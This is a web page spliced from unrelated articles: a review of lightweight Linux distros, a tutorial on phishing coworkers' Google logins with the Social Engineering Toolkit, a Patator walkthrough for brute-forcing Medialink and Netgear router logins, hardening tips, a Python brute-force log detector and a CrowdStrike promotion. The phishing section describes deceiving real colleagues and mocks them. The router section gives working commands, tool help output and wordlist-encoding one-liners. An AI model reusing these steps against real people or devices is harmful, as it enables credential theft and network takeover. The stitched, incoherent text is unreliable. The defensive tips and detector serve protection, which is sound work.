As a result, they have become too bloated for older machines, even if you manually delete files. Without a healthy dollop of system memory and an extra core or two, these distros may not deliver the best performance.
Thankfully, there are many lightweight distros, trimmed and tweaked by expert hands, which can be used to breathe new life into older hardware.
But there’s one caveat to bear in mind when working with lightweight distros – they usually manage to support ancient kit by cutting away just about everything you take for granted, such as wizards and scripts which make everyday tasks easier.
That said, these lightweight distros are fully capable of reviving older hardware and can even function as a replacement for your current operating system, if you’re willing to adjust to their way of working and install extra programs as necessary.
A featherweight distro designed for desktop use
Easy to configure
Highly streamlined and nimble distro
Plenty of help documentation on hand
Absolute Linux is a lightweight distro designed for desktop use, and as such comes preinstalled with the Firefox browser and LibreOffice suite. It’s based on Slackware 14.2 but unlike its parent OS, aims to make configuration and maintenance as simple as possible.
New versions of Absolute Linux are released roughly once a year. The most recent version (15.0) was made available for download in February 2018. It’s available as a 2GB ISO for 64-bit computers. The OS is still in the beta testing stage so may perform a little unpredictably, as ever with beta software. Whichever version you choose, there’s a massive selection of lightweight applications available.
The installer is text-based so there’s no Live mode, but nevertheless it’s incredibly simple to follow. The way Absolute is structured also means that you can add and remove packages from the install media to create a distro which truly suits you, though you’ll need some time and experience with Linux if you really want to make the most of this feature.
Once installed, Absolute Linux is incredibly nimble. This is ensured through the lightweight IceWM window manager, along with popular apps such as LibreOffice, making this OS perfect for older machines. There’s also plenty of documentation accessible from within the desktop itself to assist new users.
Tiny by name, and most certainly tiny by nature…
Incredibly compact distro
Three choices of size
It’s unsurprisingly barebones
The Core Project offers up the tiniest of Linux distros, shipping three variants on which you can build your own environments. The lightest edition is Core, weighing in at just 11MB, which comes without a graphical desktop – but you can always add one after installation.
If that’s too intimidating, try TinyCore (currently v9.0). The OS is only 16MB in size and offers a choice of FLTK or FLWM graphical desktop environments.
You can also choose to install CorePlus, which measures a relatively hefty 106MB. This spin offers a choice of lightweight window managers such as IceWM and FluxBox. CorePlus also includes support for Wi-Fi and non-US keyboards.
TinyCore saves on size by requiring a wired network connection during initial setup. The recommended amount of RAM is just 128MB. There are 32-bit and 64-bit versions as well as PiCore, which is a build for ARM devices like the Raspberry Pi.
This minimalist distro doesn’t feature many apps. After installation there’s little beyond the Terminal, a basic text editor and a network connection manager. The Control Panel provides quick access to the different configurable parts of the distro such as display, mouse, network, etc. Use the graphical package manager ‘Apps’ to install additional software such as multimedia codecs.
A neat spin on the popular OS for older machines
Ubuntu but slimmed down
Uses nifty lightweight apps
Compatible with Ubuntu repositories
The ‘L’ in Lubuntu stands for lightweight, and it unashamedly appeals to those Ubuntu users who are looking for an OS which requires fewer resources than most modern distros, but doesn’t force you to compromise on your favourite apps.
Lubuntu is primarily designed for older machines. The default desktop is based on LXQt, which is far less resource hungry than mainstream Ubuntu’s Gnome 3 desktop. It comes with a plethora of office, internet, multimedia and graphics apps, along with a wide assortment of useful tools and utilities.
As a lightweight distro, Lubuntu focuses on being fast and energy efficient. It features alternative and less resource intensive apps where possible. The most recent releases have also reverted back to using LibreOffice rather than Abiword for word processing.
This doesn’t mean that Lubuntu is lacking, though: it’s based on Linux Kernel 5.00 and Ubuntu 18.04, so it’s a proper modern Linux distro – it’s just shed all unnecessary weight, in the manner of a rally car having all but one of its seats removed.
The most recent release of Lubuntu (19.04 – Disco Dingo) has now lowered the minimum required RAM to run the OS to 500MB. However, to ensure smooth running, try to use a machine with at least 1GB of RAM. It’s available in 32-bit and 64-bit incarnations.
The unique selling point of Lubuntu is its compatibility with Ubuntu repositories, which gives users access to thousands of additional packages that can be easily installed using the Lubuntu Software Center.
A lightweight spin on Ubuntu LTS
Emphasizes stability and support
Good-looking distro
Impressive range of apps
LXLE is a lightweight version of Linux based on the annual Ubuntu LTS (long term support) release. Like Lubuntu, LXLE uses the barebones LXDE desktop environment, but as LTS releases are supported for five years, it emphasises stability and long-term hardware support. The most recent version at the time of writing (16.04.4) is a remaster of the current version of Ubuntu LTS.
Aimed primarily at reviving older machines, the distro is designed to serve as a ready to use desktop out of the box, specifically tailored to appeal to existing Windows users.
The developers spend a considerable amount of time making all the necessary mods and tweaks to improve performance, but they don’t skimp on niceties. Aesthetics are a key area of focus as evidenced by the hundred wallpapers which are included, along with clones of Windows functions like Aero Snap and Expose.
The distro boasts full featured apps across categories such as internet, sound and video, graphics, office, games, and more. It also includes plenty of useful accessories such as a Terminal-based Weather app and Penguin Pills, which is a graphical frontend for several virus scanners.
Like Lubuntu, LXLE is available as a Live image for 32-bit and 64-bit machines. The hardware requirements are 512MB of system RAM at a minimum, with 1GB recommended.
This compact OS will even run on an old 486 PC
Only needs 16MB of RAM to run
Has lots of pre-installed tools despite size
Last stable version is very old
Damn Small Linux (DSL) lives up to its name in that the install image is barely 50MB. It’s designed specifically for x86 PCs and will run on an ancient 486 CPU with 16MB of RAM. This means it can run fully inside your system memory which can result in phenomenally fast speeds.
DSL is usually run from a USB or CD, or you can do a Debian-style installation to a hard drive if you prefer.
Despite the extremely minimal desktop, you may be surprised at the vast array of tools that come preinstalled. You can surf the web with a choice of three browsers – Dillo, Firefox or the text-based browser Netrik. You can also examine office documents using the Ted word processor and check your email with the minimal Sylpheed client. Or indeed sort through your data with the ultra-tiny emelFM file manager.
The latest stable version of DSL (4.4.10) was released in 2008. However, you can update and add new applications using the MyDSL Extension Tool.
Slackware-based distro is incredibly fast and streamlined
Can run direct from system RAM
Neat choice of desktop environments
Can no longer build own custom ISO
This Slackware-based distro is designed to be completely portable and run on removable media such as a USB stick or CD, but can just as easily be installed to a hard disk. The distro is incredibly fast as it’s small enough to run entirely from system RAM.
The unique selling point of Porteus is that it exists in a compressed state (less than 300MB for the Cinnamon and MATE editions) and creates the file system on-the-fly. Besides the preinstalled apps, all additional software for the distro comes in the form of modules, making the OS very small and compact.
Porteus is available for 32-bit and 64-bit machines. The distro provides users with the choice of KDE, MATE, Cinnamon, Xfce and LXDE desktop environments when downloading the ISO image.
Unfortunately the option to build your own custom ISO has been removed since we previously looked at Porteus, but the pre-built images offer a decent selection of software and drivers, as well as an excellent selection of tutorials to help you get started.
Keeping things simple and small…
Highly flexible distro
Suitable for home desktop or office server
Available in two variants
This distro’s credo is ‘keep it simple, keep it small’, and it manages this to great effect. It allows users to mould the distro to serve just about any possible purpose – Vector Linux can be a lightning-fast desktop for home users, and can just as easily be used for running servers, or as the gateway for your office computer.
After a lengthy period, Vector Linux 7.1 was finally officially released in July 2015, and now comes in two flavours: Light and Standard. The difference is in the desktop environment used. Vector Linux Light uses the ultra-efficient IceWM for the desktop environment while the Standard version is powered by Xfce.
This Slackware-based distro tends to favour GTK+ apps such as Pidgin Messenger, but you can use the TXZ package manager to fetch and install additional software.
One of the veterans of the lightweight Linux world
Huge range of apps
Different versions for differing needs
XenialPup edition works with Ubuntu repositories
Puppy Linux is one of the oldest lightweight distros out there. The project has been turning out slim, sleek and fast distros for 15 years now, and offers different versions depending on the underlying environment. Puppy Linux 8.0 (Bionic Pup) is based on Ubuntu Bionic Beaver (18.04).
Puppy Linux developer, Barry Kauler, also manages a sister project named Quirky, a version of Puppy Linux built using the custom tool Woof-CE.
The distro is full of apps, belying its small size – some are quite unconventional, such as Homebank which helps you manage your finances, or Gwhere which is for cataloguing disks. There are also graphical tools to manage Samba shares and set up a firewall, for example. The sheer variety of applications is impressive.
The Bionic Pup edition of Puppy Linux is compatible with Ubuntu’s repositories, giving users access to the parent distro’s vast software collection. The handy QuickPet utility can be used to install some of the most popular apps.
Designed for those who won’t pay for a new version of Windows
Aimed at easing migration of Windows users
Features a host of familiar apps
Not the least demanding distro out there
Linux Lite is based on Ubuntu (currently Long Term Support version 18.04). It is specifically developed to ease Windows users – particularly those with old machines running Windows XP – into the world of Linux.
It features familiar tools like Firefox (with built-in support for Netflix), plus VLC Media Player and LibreOffice are preinstalled. The OS also includes the zRAM memory compression tool which makes it run faster on older machines. There’s also a special ‘Lite Upgrade’ utility.
Despite its name, this distribution isn’t the least resource hungry out there, as it requires both a 1.5GHz processor and at least 1GB of RAM to run smoothly. That said, this shouldn’t be too much to ask of any computer made in the last decade.
Try it on modern hardware and you’ll be amazed at just how quickly it runs. Linux Lite can boot from a Live medium such as a USB stick or CD, or install to your hard drive. It also supports multi-booting so you can keep your existing OS if you wish. The distro is available for both 32-bit and 64-bit systems.
A distro that’s carrying the Crunchbang torch onwards
Blazing fast performance
Smartly configured Openbox window manager
Crunchbang (or #!) was a very popular Debian-derived distro specifically designed to use as few system resources as possible. While it was discontinued in 2013, the community fondly remembered its lightning speed and responded with two Crunchbang-based distros to continue its legacy.
However, one of those successors, Crunchbang++, has now been discontinued. BunsenLabs is still active, though, and its current release (Helium) is based on the latest stable version of Debian featuring a gorgeously configured Openbox window manager and its own repository of core packages.
There’s also a point release option, which is regularly updated if you want to stay on the bleeding-edge. It requires at least 256MB of RAM to run (with 1GB or more recommended).
Humans are the best resource and end-point of security vulnerabilities ever. Social engineering is a kind of attack that targets human behavior by manipulating and playing on people’s trust, with the aim of gaining confidential information such as banking accounts, social media accounts, email, or even access to the target computer. No system is safe, because systems are made by humans. The most common social engineering attack vector is phishing spread through email spam. Attackers target victims who have a financial account, such as banking or credit card information.
Social engineering attacks do not break into a system directly; instead they use human social interaction, and the attacker deals with the victim directly.
Do you remember Kevin Mitnick? The Social Engineering legend of the old era. In most of his attack methods, he used to trick victims into believing that he holds the system authority. You might have seen his Social Engineering Attack demo video on YouTube. Look at it!
In this post I am going to show you a simple scenario of how a Social Engineering Attack is carried out in daily life. It is so easy, just follow along with the tutorial carefully. I will explain the scenario clearly.
Social Engineering Attack to gain email access
Goal: Gaining email credential account information
Target: My friend. (Really? yes)
Device: Computer or laptop running Kali Linux. And my mobile phone!
Environment: Office (at work)
Tool: Social Engineering Toolkit (SET)
So, based on the scenario above, you can imagine that we don’t even need the victim’s device; I used my laptop and my phone. I only need his head and trust, and stupidity too! Because, you know, human stupidity cannot be patched, seriously!
In this case we are first going to set up a phishing Gmail account login page on my Kali Linux machine, and use my phone as the trigger device. Why did I use my phone? I will explain below, later.
Fortunately we are not going to install any tools: our Kali Linux machine has SET (Social Engineering Toolkit) pre-installed. That’s all we need. Oh yeah, if you don’t know what SET is, I will give you the background on this toolkit.
Alright, that was enough; let’s do the practice. Before we conduct the social engineering attack, we need to set up our phishing page first. Here, I am sitting at my desk, and my computer (running Kali Linux) is connected to the internet on the same Wi-Fi network as my mobile phone (I am using Android).
STEP 1. SETUP PHISHING PAGE
Setoolkit uses a command-line interface, so don’t expect ‘clicky-clicky’ things here. Open up a terminal and type:
~# setoolkit
You will see the welcome page at the top and the attack options at the bottom, you should see something like this.
Yes, of course, we are going to perform Social Engineering Attacks, so choose number 1 and hit ENTER.
Then you will be shown the next options; choose number 2. Website Attack Vectors. Hit ENTER.
Next, we choose number 3. Credential Harvester Attack Method. Hit Enter.
The further options are narrower. SET has pre-formatted phishing pages of popular websites, such as Google, Yahoo, Twitter and Facebook. Now choose number 1. Web Templates.
Because my Kali Linux PC and my mobile phone were on the same Wi-Fi network, just input the attacker’s (my PC’s) local IP address. And hit ENTER.
PS: To check your device IP address, type: ‘ifconfig’
Alright, so far we have set our method and the listener IP address. This menu lists the pre-defined web phishing templates I mentioned above. Because we are aiming at the Google account page, we choose number 2. Google. Hit ENTER.
Now SET starts my Kali Linux web server on port 80, with the fake Google account login page. Our setup is done. Now I am ready to walk into my friend’s room to log in to this phishing page using my mobile phone.
STEP 2. HUNTING VICTIMS
Why am I using a mobile phone (Android)? Let’s see how the page is displayed in my built-in Android browser. So, I am accessing my Kali Linux web server on 192.168.43.99 in the browser. And here is the page:
See? It looks so real, and there are no security issues displayed on it. The URL bar shows the title instead of the URL itself. We know the stupid will recognize this as the original Google page.
So, I bring my mobile phone, walk over to my friend, and talk to him as if I had failed to log in to Google, acting as if I am wondering whether Google crashed or errored. I give him my phone and ask him to try to log in using his account. He doesn’t believe my words and immediately begins typing in his account information as if nothing bad will happen here. Haha.
He has already filled in all the required fields, and lets me click the Sign in button. I click the button… Now it is loading… And then we get the Google search engine main page like this.
PS: Once the victim clicks the Sign in button, it will send the authentication information to our listener machine, and it is logged.
Nothing is happening, I tell him; the Sign In button is still there, so you failed to log in. And then I open the phishing page again, while another friend of this stupid comes over to us. Nah, we got another victim.
Until I cut the talk, then I go back to my desk and check the log of my SET. And here we got,
Gotcha… I pwnd you!!!
I am not good at storytelling (that’s the point); to sum up the attack so far, the steps are:
Router gateways are responsible for protecting every aspect of a network’s configuration. With unfettered access to these privileged configurations, an attacker on a compromised Wi-Fi network can perform a wide variety of advanced attacks.
With access to the router’s gateway and complete control over the configurations, a hacker in this position of power can perform a variety of attacks. They could do any of the following, and then some.
perform DNS poisoning attacks
modify or manipulate forwarding ports
reset the gateway password
reset the Wi-Fi name and password
install a malicious firmware
modify or delete login and system logs
modify or disable the firewall
Patator, like Hydra and Medusa, is a command-line brute-forcing tool. The developers have tried to make it more reliable and flexible than its predecessors. My favorite feature of Patator is the raw_request module that allows penetration testers to brute-force HTTP logins much like Burp’s Intruder module.
A General Outline for an Attack
To demonstrate, I’m going to show how to use Patator against two popular consumer routers found on Amazon. Not all router gateways handle authentication the same. I’ll show a kind of general procedure to follow when performing such attacks.
Capture a login request: A single login attempt is captured in Burp to analyze the request.
Identify the parameters: It’s important to identify where the dynamic parameters (i.e., username and password) are stored in the request as some login forms handle authentication differently.
Modify and save the request: After the parameters have been identified, insert a placeholder into the request to help Patator iterate through the desired wordlist.
Generate a targeted wordlist: A targeted wordlist containing 10,000 passwords is usually more effective than a wordlist of 10 million random passwords. Some authentication methods involve hashing or encoding the credentials in the client’s browser before making the request. The wordlist will need to reflect this as needed.
Identify and filter failed requests: With modern routers, very rarely will a successful login attempt make itself known. Understanding and filtering HTTP status codes play a big part in identifying the difference between a failed and successful login attempt.
Now, a word of caution: Patator isn’t very beginner-friendly, so there’s a bit of a learning curve with the syntax that can take some getting used to. Before proceeding, you should have a general understanding of HTTP requests, HTTP status codes, and some experience with Burp’s Intruder module.
Install Patator in Kali Linux
Use the following apt-get command to install Patator in Kali.
~# apt-get update && apt-get install patator
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
ca-certificates-java default-jre default-jre-headless fonts-dejavu-extra freerdp2-x11 ike-scan java-common ldap-utils libatk-wrapper-java libatk-wrapper-java-jni libfreerdp-client2-2
libfreerdp2-2 libgif7 libwinpr2-2 openjdk-11-jre openjdk-11-jre-headless patator python3-ajpy python3-bcrypt python3-dnspython python3-ipy python3-mysqldb python3-nacl python3-openssl
python3-paramiko python3-psycopg2 unzip
0 upgraded, 27 newly installed, 0 to remove and 0 not upgraded.
Need to get 43.9 MB of archives.
After this operation, 192 MB of additional disk space will be used.
Do you want to continue? [Y/n]
When that’s done, use the --help option to verify Patator was successfully installed and view the available modules.
As stated, we’ll focus on the http_fuzz module, designed to brute-force HTTP logins as well as perform various types of web-based injection attacks (e.g., fuzzing). View the available http_fuzz options using the following command.
~# patator http_fuzz --help
Patator v0.7 (https://github.com/lanjelot/patator)
Usage: http_fuzz <module-options ...> [global-options ...]
http_fuzz url=http://10.0.0.1/FILE0 0=paths.txt -x ignore:code=404 -x ignore,retry:code=500
http_fuzz url=http://10.0.0.1/manager/html user_pass=COMBO00:COMBO01 0=combos.txt -x ignore:code=401
http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=root&pma_password=FILE0&server=1&lang=en' 0=passwords.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server'
url : target url (scheme://host[:port]/path?query)
body : body data
header : use custom headers
method : method to use [GET|POST|HEAD|...]
raw_request : load request from file
scheme : scheme [http|https]
auto_urlencode: automatically perform URL-encoding [1|0]
user_pass : username and password for HTTP authentication (user:pass)
auth_type : type of HTTP authentication [basic | digest | ntlm]
follow : follow any Location redirect [0|1]
max_follow : redirection limit 
accept_cookie : save received cookies to issue them in future requests [0|1]
proxy : proxy to use (host:port)
proxy_type : proxy type [http|socks4|socks4a|socks5]
resolve : hostname to IP address resolution to use (hostname:IP)
ssl_cert : client SSL certificate file (cert+key in PEM format)
timeout_tcp : seconds to wait for a TCP handshake 
timeout : seconds to wait for a HTTP response 
before_urls : comma-separated URLs to query before the main request
before_header : use a custom header in the before_urls request
before_egrep : extract data from the before_urls response to place in the main request
after_urls : comma-separated URLs to query after the main request
max_mem : store no more than N bytes of request+response data in memory [-1 (unlimited)]
persistent : use persistent connections [1|0]
--version show program's version number and exit
-h, --help show this help message and exit
-x arg actions and conditions, see Syntax below
--start=N start from offset N in the wordlist product
--stop=N stop at offset N
--resume=r1[,rN]* resume previous run
-e arg encode everything between two tags, see Syntax below
-C str delimiter string in combo files (default is ':')
-X str delimiter string in conditions (default is ',')
failures cannot be ignored with -x (this is by design
to avoid false negatives) this option overrides this
--rate-limit=N wait N seconds between each test (default is 0)
--timeout=N wait N seconds for a response before retrying payload
(default is 0)
--max-retries=N skip payload after N retries (default is 4) (-1 for
-t N, --threads=N number of threads (default is 10)
-l DIR save output and response data into DIR
-L SFX automatically save into DIR/yyyy-mm-dd/hh:mm:ss_SFX
(DIR defaults to '/tmp/patator')
-d, --debug enable debug messages
actions := action[,action]*
action := "ignore" | "retry" | "free" | "quit" | "reset"
conditions := condition=value[,condition=value]*
condition := "code" | "size" | "time" | "mesg" | "fgrep" | "egrep" | "clen"
ignore : do not report
retry : try payload again
free : dismiss future similar payloads
quit : terminate execution now
reset : close current connection in order to reconnect next time
code : match status code
size : match size (N or N-M or N- or -N)
time : match time (N or N-M or N- or -N)
mesg : match message
fgrep : search for string in mesg
egrep : search for regex in mesg
clen : match Content-Length header (N or N-M or N- or -N)
For example, to ignore all redirects to the home page:
... -x ignore:code=302,fgrep='Location: /home.html'
tag := any unique string (eg. T@G or _@@_ or ...)
encoding := "hex" | "unhex" | "b64" | "md5" | "sha1" | "url"
hex : encode in hexadecimal
unhex : decode from hexadecimal
b64 : encode in base64
md5 : hash in md5
sha1 : hash in sha1
url : url encode
For example, to encode every password in base64:
... host=10.0.0.1 user=admin password=_@@_FILE0_@@_ -e _@@_:b64
Please read the README inside for more examples and usage information.
1. Attacking the Medialink AC1200 Router
The first router being attacked is the Medialink AC1200. It’s currently one of Amazon’s top choices for consumer routers and quite popular.
That tells us that the wordlist used when brute-forcing the gateway must be in MD5 format. With this particular router, at the gateway, there’s no available field for username input. We can see from the captured data that the “admin” username is embedded into the request. So there’s only one dynamic parameter: the password.
Step 3: Modify & Save the Raw Request
Change the hashed password parameter to “FILE0” within the request. The modification will act as a placeholder in the request that indicates to Patator where to insert the passwords. (The reason for this will be clear in a later step.)
When that’s done, right-click inside the Burp window and select the “Copy to file” option. Save it to the /tmp directory with the “router_request.txt” filename.
Step 4: Generate a Targeted Wordlist
As we discovered previously, passwords are hashed in the browser before being sent to the router. Patator has a built-in feature to hash passwords, but let’s take this opportunity to learn some Bash password manipulation tricks.
First, download a preferred wordlist. Any generic wordlist will do fine for testing purposes. Use the below wget command to download my wordlist generated by analyzing leaked databases.
With the router_request.txt and the wordlist of hashed passwords, the router’s gateway can be brute-forced with the following Patator command. To stop the brute-force attack at any time, press Control-C on the keyboard.
Hypertext Transfer Protocol (HTTP) status codes, also known as response codes, are issued by web servers to our web browser when we make requests. These codes are a way for web servers to communicate errors to sysadmins, web developers, and end-users alike.
Sometimes the 200 (“200 OK”) status code is an indication that the server accepted the provided password. In this case, every single login attempt is producing the “200 OK” response — so it’s actually helping to identify what a failed login attempt looks like.
The “size” column can also be extremely helpful. It will display the size (in bytes) of the server’s response to the login attempt. It’s returning 20 bytes with every login attempt, so it’s probably safe to assume this byte size indicates a failed login attempt, in which case, it’s safe to omit responses of that size. We can do so by adding the -x ignore:size=20 option and argument.
Now, only one request is displayed, with a size of 3,962 bytes.
There are a few ways of unhashing a discovered password. The passwords in both wordlist.txt and md5_wordlist.txt appear in the same order. The only difference is that one wordlist is in plain text; the other is hashed.
Below, we’ll use nl to prepend a number to every line in the md5_wordlist.txt, then grep for the hash.
A router from the Netgear N300 series is next on the list of targets. It’s also one of Amazon’s top choices for entry-level, consumer Wi-Fi routers.
Step 1: Capture a Login Request with Burp
We’ll follow the same procedure as before, starting with capturing the raw request. Navigate to the router’s gateway using a web browser configured to proxy through Burp. Enter the “admin” and “password” credentials when prompted.
Step 2: Identify the Parameters
Notice this time there isn’t an obvious password= parameter like the Medialink AC1200 router.
The above string isn’t hashed with MD5. While it may appear encrypted or secured in some way, it’s using a simple base64 encoding. The string is decoded using the below command.
The username and password are concatenated into a single string and encoded. This authentication method is called basic HTTP authentication. It should only be used with HTTPS, as an attacker on the network can easily capture the credentials in transit.
Step 3: Modify & Save the Raw Request
With the username and password parameters identified, the raw request is modified to include the Patator placeholder (“FILE0”) and saved to a local file.
Right-click inside the window and select the “Copy to file” option. Save it to the /tmp directory with the “router_request.txt” filename.
Step 4: Generate a Targeted Wordlist
Now that we know the kind of authentication parameter being used, a wordlist can be generated specific to the router. Again, Patator has a built-in feature to encode passwords, but string manipulation with Bash is a good skill to learn. It can be applied to other brute-forcing tools, for example.
The below Bash one-liner will use a while loop to iterate through the passwords in the wordlist. Each password will be concatenated with the username into a single string and converted into base64. All of the encoded strings are appended to the /tmp/base64_wordlist.txt file.
~# while read password; do printf "admin:$password" | base64; done < /tmp/wordlist.txt >>/tmp/base64_wordlist.txt
The encoded passwords can be verified using the below head command to print the first ten lines of the file.
The router’s gateway can be brute-forced with Patator using the router_request.txt and base64_wordlist.txt files. Remember, while in progress, Patator can be stopped at any time by pressing Control-C on the keyboard.
HTTP status codes are split into several categories or “classes.” The first digit defines the categories, and the following digits are subcategories specific to different types of error messages. For example, the 4xx categories are a class of errors specific to HTTP requests that cannot be fulfilled by the web server, like trying to view a webpage that doesn’t exist. That’s defined as a status “404 Not Found,” probably one of the most well-known status codes on the internet.
We immediately notice a ton of 401 status codes in the Patator output, which are clear indications of failed login requests. These are omitted from the output using the -x ignore:code=401 option and argument.
This time, we received only one request with the 200 status code. The size of the response is 622 bytes, more than that of a failed 401 response. It’s a good sign. The login credentials are decoded using the following command.
How to Protect Yourself from Router Gateway Attacks
Regularly updating the firmware will help protect against exploits and Routersploit attacks. A strong (non-default) password will prevent brute-force attacks performed with Patator.
Update the firmware. Router manufacturers often issue bug and exploit patches. It’s important to keep the router firmware up to date and have it check for updates automatically if possible.
Disable remote administration. Some consumer routers allow for remote access by default. Without knowing it, hackers may find your router on Shodan and seize control of it.
WPA2 encryption. Only use WPA2 encryption. Weaker encryption options like WEP will leave the router extremely vulnerable to attackers.
Change default passwords. Never use the default credentials. In addition to the WPA2 pre-shared key, the admin portal (router gateway) should also be protected by a strong password. It’s the only defensive measure preventing an attacker from discovering default credentials and modifying sensitive settings.
Disable WPS. WPS is featured in most consumer routers and designed to make password-less authentication more convenient. Unfortunately, the feature is usually enabled by default and easily exploited by hackers.
Be persistent. Change your Wi-Fi password every few months. It’s a pain to update the Wi-Fi password for every device on the network, but this tactic will keep hackers guessing — literally. If a hacker has captured the WPA2 handshake and spends several weeks trying to crack the password, changing it will render the captured handshake useless.
Unfortunately, none of the routers I tested support HTTPS when authenticating the admin settings. So an attacker on the network inspecting traffic will be able to passively discover the login password — even if it’s a totally random 42-character password.
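The pattern seen in the Patator output above, a flood of 401 responses followed by a single 200, is also what a defender can look for in the gateway's access log. The following is an added example, not code from the original article; it assumes the router or a proxy in front of it writes Common Log Format lines, and the sample log, the function name detect_bruteforce and the thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (Common Log Format); addresses, times and sizes are made up.
SAMPLE_LOG = "\n".join(
    [f'192.168.1.50 - - [12/Mar/2021:10:00:{s:02d} +0000] "GET / HTTP/1.1" 401 381'
     for s in range(1, 9)]                      # eight failed logins in eight seconds
    + ['192.168.1.50 - admin [12/Mar/2021:10:00:09 +0000] "GET / HTTP/1.1" 200 622',
       # a legitimate user who mistyped the password once
       '192.168.1.20 - - [12/Mar/2021:10:05:00 +0000] "GET / HTTP/1.1" 401 381',
       '192.168.1.20 - admin [12/Mar/2021:10:05:20 +0000] "GET / HTTP/1.1" 200 622'])

# client, identd, authenticated user, [timestamp], "request", status, size
LINE_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "[^"]*" (\d{3}) \S+')

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag clients that produce `threshold` or more 401s inside `window`,
    and record the user name if that client later gets an authenticated 200."""
    recent = defaultdict(list)   # ip -> timestamps of 401s still inside the window
    alerts = {}                  # ip -> alert record
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue             # skip lines that are not in the expected format
        ip, user, status = m.group(1), m.group(2), int(m.group(4))
        when = datetime.strptime(m.group(3), "%d/%b/%Y:%H:%M:%S %z")
        if status == 401:
            # Slide the window: drop failures older than `window`, add this one.
            recent[ip] = [t for t in recent[ip] if when - t <= window] + [when]
            if len(recent[ip]) >= threshold:
                alert = alerts.setdefault(
                    ip, {"ip": ip, "failures": 0, "success_user": None})
                alert["failures"] = max(alert["failures"], len(recent[ip]))
        elif (status == 200 and user != "-" and ip in alerts
              and alerts[ip]["success_user"] is None):
            # A successful login after a burst of failures: treat the
            # password as guessed and rotate it.
            alerts[ip]["success_user"] = user
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The single mistyped password from 192.168.1.20 stays below the threshold and is not reported; only the client with the burst of failures is flagged.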
Kali Linux is a popular tool for penetration testing and security testing. Here's how to install it.
Installing Kali Linux on the hard drive
First, download Kali Linux for your PC. You can then use a program such as "Etcher" to install the ISO on a USB stick. Then boot from this stick and […]
CrowdStrike has extended its Falcon platform with additional capabilities for protecting Linux systems. The new features include machine-learning-based prevention as well as custom and dynamic Indicators of Attack (IoAs).
(Image source: Imagentle / shutterstock.com)
As one of the primary operating systems for business-critical servers, Linux systems are a recurring target of cybercriminals. Enterprise workloads are increasingly being migrated to the cloud, a trend that the COVID-19 pandemic has accelerated further.
Today's rapidly evolving cloud workloads require an all-encompassing solution that provides deep runtime security for Linux hosts, whether they run in private or public clouds or in on-premises data centers. This also includes securing workloads in containers that run on Linux hosts.
CrowdStrike Falcon offers a platform-centric approach that secures these different workloads with a single agent. The Falcon agent lets customers use custom IoAs to tune behavioral detection and prevention precisely to their operating environment.
CrowdStrike's cloud-based machine learning engine is continuously enriched and improved to enable timely and reliable malware detection without signature files having to be managed and updated. More than half of all CrowdStrike customers rely on the complexity-free user experience of the Falcon platform to protect their cloud workloads and can therefore do without additional point products.